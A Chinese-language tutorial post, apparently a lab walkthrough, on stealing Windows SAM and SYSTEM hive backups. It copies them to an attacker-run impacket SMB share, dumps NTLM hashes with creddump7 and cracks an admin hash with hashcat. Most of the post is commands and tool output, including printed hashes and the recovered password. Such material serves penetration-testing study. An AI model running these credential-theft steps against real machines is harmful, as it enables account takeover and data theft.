视频播放至7:15后才是该帖子内容
Security Accounts Manager又称SAM,用于存储本地用户帐户的安全信息。
这些哈希用密钥加密的,但这个密钥可以在SYSTEM的文件中找到。
如果你能读取到SAM和系统文件,则可以提取到哈希的密码。
SAM/SYSTEM Locations
SAM和SYSTEM文件位于C:\\Windows\\System32\\config directory
在 Windows 运行时,文件已锁定。
文件的备份可能存在于C:\\Windows\\Repair or C:\\Windows\\System32\\config\\RegBack directories
主机挂载smb共享目录
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
攻击机执行copy到远程挂载的smb共享目录中
攻击机执行copy到远程挂载的smb共享目录中
copy C:\\Windows\\Repair\\SAM \\\\10.13.22.153\\kali\\运行结果
┌──(root㉿kali)-[~/桌面]
└─# sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.11.175,49898)
[*] AUTHENTICATE_MESSAGE (WIN-QBA94KB3IOF\\user,WIN-QBA94KB3IOF)
[*] User WIN-QBA94KB3IOF\\user authenticated successfully
[*] user::WIN-QBA94KB3IOF:aaaaaaaaaaaaaaaa:9801547dd0bfaf2f557bd7157a2a5e8e:010100000000000000ad932a8d63d9017bd920b041f45a7200000000010010004a00700041006b005a0048004b007a00030010004a00700041006b005a0048004b007a00020010006f004600690078006e00690056005300040010006f004600690078006e006900560053000700080000ad932a8d63d9010600040002000000080030003000000000000000000000000020000050923a0a318b81b09a42179568e61e9aefa5ef21ac259654b6f8e5cdec9d3a170a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310033002e00320032002e00310035003300000000000000000000000000
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:KALI)
[*] Closing down connection (10.10.11.175,49898)
[*] Remaining connections []
[*] Incoming connection (10.10.11.175,49920)
[*] AUTHENTICATE_MESSAGE (WIN-QBA94KB3IOF\\user,WIN-QBA94KB3IOF)
[*] User WIN-QBA94KB3IOF\\user authenticated successfully
[*] user::WIN-QBA94KB3IOF:aaaaaaaaaaaaaaaa:3a9edb604219d62a553f0605f6c54cea:010100000000000080f8a2f48d63d901541520428d20ea4600000000010010004a00700041006b005a0048004b007a00030010004a00700041006b005a0048004b007a00020010006f004600690078006e00690056005300040010006f004600690078006e006900560053000700080080f8a2f48d63d9010600040002000000080030003000000000000000000000000020000050923a0a318b81b09a42179568e61e9aefa5ef21ac259654b6f8e5cdec9d3a170a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310033002e00320032002e00310035003300000000000000000000000000
在 攻击机上,克隆 creddump7 存储库(Kali 上的存储库已过时,不会为 Windows 10 正确转储哈希!)并使用它从 SAM 和 SYSTEM 文件中转储哈希:
git clone <https://github.com/Tib3rius/creddump7>
pip3 install pycrypto
python3 creddump7/pwdump.py SYSTEM SAM
这里有个坑
使用 pip3 install pycrypto 安装没成功,报错了
然后我使用了 pip3 install pycryptodome -i <https://pypi.tuna.tsinghua.edu.cn/simple/ ,则可以成功安装
┌──(root㉿kali)-[~/桌面]
└─# pip3 install pycryptodome -i <https://pypi.tuna.tsinghua.edu.cn/simple/>
Looking in indexes: <https://pypi.tuna.tsinghua.edu.cn/simple/>
Collecting pycryptodome
Downloading <https://pypi.tuna.tsinghua.edu.cn/packages/14/58/77278d7a078241b55b515f6073b90108125fb0d197b384a0f372c5f61c80/pycryptodome-3.17-cp35-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl> (2.1 MB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 2.1/2.1 MB 660.3 kB/s eta 0:00:00
Installing collected packages: pycryptodome
Successfully installed pycryptodome-3.17
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: <https://pip.pypa.io/warnings/venv>
┌──(root㉿kali)-[~/桌面]
└─#
运行对SAM和SYSTEM文件的工具来提取NTLM哈希:
┌──(root㉿kali)-[~/桌面]
└─# python3 creddump7/pwdump.py SYSTEM SAM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6ebaa6d5e6e601996eefe4b6048834c2:::
user:1000:aad3b435b51404eeaad3b435b51404ee:91ef1073f6ae95f5ea6ace91c09a963a:::
admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
使用hashcat破解管理员用户NTLM哈希:
hashcat -m 1000 --force <hash> /usr/share/wordlists/rockyou.txt
第一次运行要将kali这个目录下的 rockyou.zip 解压出来,不然这个文件是不存在的
解压好之后就可以执行以上获取到的NTLM哈希进行破解了
hashcat -m 1000 --force a9fdfa038c4b75ebc76dc855dd74f0da /usr/share/wordlists/rockyou.txt
运行结果
┌──(root㉿kali)-[~/桌面]
└─# hashcat -m 1000 --force a9fdfa038c4b75ebc76dc855dd74f0da /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 14.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-sandybridge-Intel(R) Core(TM) i5-9400 CPU @ 2.90GHz, 1435/2934 MB (512 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache building /usr/share/wordlists/rockyou.txt: 33553434 bytes (2Dictionary cache building /usr/share/wordlists/rockyou.txt: 134213744 bytes (Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
**a9fdfa038c4b75ebc76dc855dd74f0da:password123**
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1000 (NTLM)
Hash.Target......: a9fdfa038c4b75ebc76dc855dd74f0da
Time.Started.....: Fri Mar 31 01:42:01 2023, (0 secs)
Time.Estimated...: Fri Mar 31 01:42:01 2023, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 27405 H/s (0.09ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2048/14344385 (0.01%)
Rejected.........: 0/2048 (0.00%)
Restore.Point....: 1024/14344385 (0.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: kucing -> lovers1
Hardware.Mon.#1..: Util: 24%
Started: Fri Mar 31 01:41:30 2023
Stopped: Fri Mar 31 01:42:02 2023
┌──(root㉿kali)-[~/桌面]
└─#
可以看到以上破解的账密
a9fdfa038c4b75ebc76dc855dd74f0da:password123
然后直接登入上去
免责声明:
H4K6技术社区所提供的一切软件、教程、漏洞信息、破解补丁、注册机、注册信息及软硬件解密分析文章等仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请自行承担。H4K6技术社区不承担任何因为技术滥用所产生的连带责任。H4K6技术社区所有发布的信息资源来源于互联网,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
